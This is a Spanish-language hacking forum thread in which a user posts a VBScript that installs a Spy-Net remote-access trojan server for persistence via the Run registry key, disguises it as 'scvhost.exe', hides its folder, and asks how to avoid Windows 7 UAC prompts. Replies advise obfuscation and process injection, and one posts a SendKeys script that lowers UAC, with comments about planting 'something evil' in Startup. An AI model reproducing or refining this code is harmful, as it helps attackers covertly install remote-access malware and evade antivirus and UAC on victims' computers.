Saludos a todos, tengo un problema, se trata de un script en VBs que uso para añadir al regitro el server de spy net, de este modo consigo saltarme la preactiva de algunos AV (como el AVG 2011) pero aunque me la salte, me salta la uac del win 7 notificando del intento de añadirse al regitro, mostrnado el nombre y el proceso del server y pidiendo permiso o si deseo cancelarlo =(, hay algun modo de conseguir que la uac no salte?
aqui os dejo el codigo que he usado, que no es de mi autoria :
set indetectable = createobject("wscript.shell")
indetectable.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PRUEBA" , "%APPDATA%\PRUEBA\scvhost.exe" , "REG_EXPAND_SZ"
indetectable.Run "attrib +r +s +h %APPDATA%\PRUEBA" , VbHide
indetectable.Run "attrib +r +s +h %APPDATA%\PRUEBA\*.*" , VbHide
espero que me podais ayudar, espero vuestras respuestas
Saludos y gracias!
Esto no da respuesta a tu pregunta completamente pero es para que te des una idea de como puedes hacerlo
https://underc0de.org/foro/dudas-generales-121/vbs-ofuscado-32317/
Gracias me ha servido un poco para orientarme, pero tambien estuve hablando con ANTRAX sobre el tema y me dijo que tenia que osfuncar el script y con eso lo tendria listo, alguien domina ese tema ?
Ofuscarlo seria para saltar los Avs cuando escanean pero para esto no sirve ya que lo que detecta es la accion de añadirse al registro...
Nose si se podrá hacer esto en VBS sin que lo detecte la seguridad de windows, en otros lenguajes podrías intentar inyectar código en un proceso con derechos como explorer y etc. Tambien puedes provar a desactivar la UAC :).
salu2!
EDITO:
Ahi te va un código que encontre por la red para desactivarlo:
'// 1337H4x Written by _____________
'// (12 year old)
Set WshShell = WScript.CreateObject("WScript.Shell")
'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)
'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)
'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)
'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")
'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder
'// Reboot the system
'// WshShell.Run "shutdown /r /f"
Link de la web:
https://www.underground.org.mx/index.php?topic=22744.0
Gracias Drinky94 =D, acabo de probarlo en vbs, pero no desactiva la uac, se ve que hay un fallo en la secuencia de acciones que ordena el script
Me hicieron acordar del maldito avg. Lo que acaban de citar, (es bueno poner la fuente) es de Geminis.
Entre todos tenemos que burlar esa maldita proactiva del maldito Avg.
De la noche a la mañana se ha puesto serio.